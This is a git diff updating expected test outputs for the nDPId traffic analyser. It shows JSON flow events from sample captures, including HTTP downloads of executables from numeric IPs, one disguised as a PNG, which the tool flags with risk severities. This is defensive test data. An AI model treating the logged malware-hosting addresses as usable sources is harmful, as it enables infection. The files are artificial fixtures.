+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1352718180400,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"ts_msec":1352718180400,"pkt":"eOfR4AJeAAC8X0lRCABFAAB0TSZAAEAG0pqNUQAXjVEACq8S9P3GYWLjJth91VAYEADGbgAAcAA0AAABAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAtccAgLEAIABx7IoAAAAEAAoADgASABYAzgAAAM4AAADOAAAAzgAAAA=="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1352718180599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1352718180599,"pkt":"AAC8X0lReOfR4AJeCABFAAAocJ5AAIAGAACNUQAKjVEAF\/T9rxIm2H3VxmFjL1AQ+vAa3gAA"}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","ndpi": {"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
-00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","ndpi": {"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","ndpi": {"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","ndpi": {"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","total-events-serialized":26}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 100/100
 ~~ skipped flows.............: 0
 ~~ total layer4 data length..: 11876 bytes
-~~ total detected protocols..: 0
+~~ total detected protocols..: 4
 ~~ total active/idle flows...: 4/4
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4677247 bytes
-~~ total memory freed........: 4677247 bytes
-~~ total allocations/frees...: 99690/99690
+~~ total memory allocated....: 4685298 bytes
+~~ total memory freed........: 4685298 bytes
+~~ total allocations/frees...: 101252/101252
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
 ~~ json string max len.......: 2068 chars
diff --git a/test/results/exe_download.pcap.out b/test/results/exe_download.pcap.out
index ad777ca79..e475784f7 100644
--- a/test/results/exe_download.pcap.out
+++ b/test/results/exe_download.pcap.out
@@ -3,9 +3,9 @@
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434051004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569434051004,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0AI9AAIAGAKkKCRllkFtFw8ANAFC+hvgeAAAAAIACIADegAAAAgQFtAEDAwgBAQQC"}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1569434051324,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsBbAAAIAGO5CQW0XDCgkZZQBQwA0+79i4vob4H2AS+vAU7QAAAgQFtA=="}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1569434051324,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoALJAAIAGAJIKCRllkFtFw8ANAFC+hvgfPu\/YuVAQ+vAsqgAA"}
-00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434051004,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569434051324,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":0,"content_type":"","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}}
-00871{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434051004,"flow_last_seen":1569434051623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1569434051623,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4":"Binary application transfer","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":200,"content_type":"application\/octet-stream","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}}
-00737{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":703,"flow_first_seen":1569434051004,"flow_last_seen":1569434056186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":679485,"flow_avg_l4_payload_len":966,"midstream":0,"ts_msec":1569434056186,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4":"Binary application transfer","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
+00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434051004,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569434051324,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":0,"content_type":"","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}}
+01060{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434051004,"flow_last_seen":1569434051623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1569434051623,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":200,"content_type":"application\/octet-stream","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}}
+00926{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":703,"flow_first_seen":1569434051004,"flow_last_seen":1569434056186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":679485,"flow_avg_l4_payload_len":966,"midstream":0,"ts_msec":1569434056186,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
 00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 703/703
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4615296 bytes
-~~ total memory freed........: 4615296 bytes
-~~ total allocations/frees...: 100259/100259
+~~ total memory allocated....: 4700249 bytes
+~~ total memory freed........: 4700249 bytes
+~~ total allocations/frees...: 101849/101849
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
-~~ json string max len.......: 876 chars
-~~ json string avg len.......: 578 chars
+~~ json string max len.......: 1065 chars
+~~ json string avg len.......: 664 chars
diff --git a/test/results/exe_download_as_png.pcap.out b/test/results/exe_download_as_png.pcap.out
index bf16f6a37..8a55e882d 100644
--- a/test/results/exe_download_as_png.pcap.out
+++ b/test/results/exe_download_as_png.pcap.out
@@ -3,9 +3,9 @@
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434903040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569434903040,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0Bk9AAIAGv+sKCRlluWJXucAtAFB7PMGWAAAAAIACIAAdNgAAAgQFtAEDAwgBAQQC"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434903440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1569434903440,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsESIAAIAG9SC5Yle5CgkZZQBQwC0vLgrVezzBl2AS+vAxRwAAAgQFtA=="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434903440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1569434903440,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoBlJAAIAGv\/QKCRlluWJXucAtAFB7PMGXLy4K1lAQ+vBJBAAA"}
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434903040,"flow_last_seen":1569434903441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1569434903441,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":0,"content_type":"","user_agent":"WinHTTP loader\/1.0"}}
-00849{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434903040,"flow_last_seen":1569434904053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1609,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1569434904053,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4":"Binary application transfer","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":200,"content_type":"image\/png","user_agent":"WinHTTP loader\/1.0"}}
-00739{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":534,"flow_first_seen":1569434903040,"flow_last_seen":1569434972556,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":500597,"flow_avg_l4_payload_len":937,"midstream":0,"ts_msec":1569434972556,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4":"Binary application transfer","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434903040,"flow_last_seen":1569434903441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1569434903441,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":0,"content_type":"","user_agent":"WinHTTP loader\/1.0"}}
+01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434903040,"flow_last_seen":1569434904053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1609,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1569434904053,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":200,"content_type":"image\/png","user_agent":"WinHTTP loader\/1.0"}}
+00928{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":534,"flow_first_seen":1569434903040,"flow_last_seen":1569434972556,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":500597,"flow_avg_l4_payload_len":937,"midstream":0,"ts_msec":1569434972556,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00168{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 534/534
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4610370 bytes
-~~ total memory freed........: 4610370 bytes
-~~ total allocations/frees...: 100090/100090
+~~ total memory allocated....: 4695323 bytes
+~~ total memory freed........: 4695323 bytes
+~~ total allocations/frees...: 101680/101680
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 173 chars
-~~ json string max len.......: 854 chars
-~~ json string avg len.......: 572 chars
+~~ json string max len.......: 1043 chars
+~~ json string avg len.......: 658 chars
diff --git a/test/results/facebook.pcap.out b/test/results/facebook.pcap.out
index 3f2826f6a..081d5b403 100644
--- a/test/results/facebook.pcap.out
+++ b/test/results/facebook.pcap.out
@@ -3,16 +3,16 @@
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1472393122365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1472393122365,"pkt":"mAyC0zx8MFLLbJwbCABFAAA84M9AAEAGjxHAqCsSQtycRMtiAbv14btyAAAAAKACchDLCQAAAgQFtAQCCAoAS1u9AAAAAAEDAwc="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1472393122668,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAE0GYuFC3JxEwKgrEgG7y2LsHfNy9eG7c6ASNpzIhwAAAgQFeAQCCAq7uwhkAEtbvQEDAwg="}
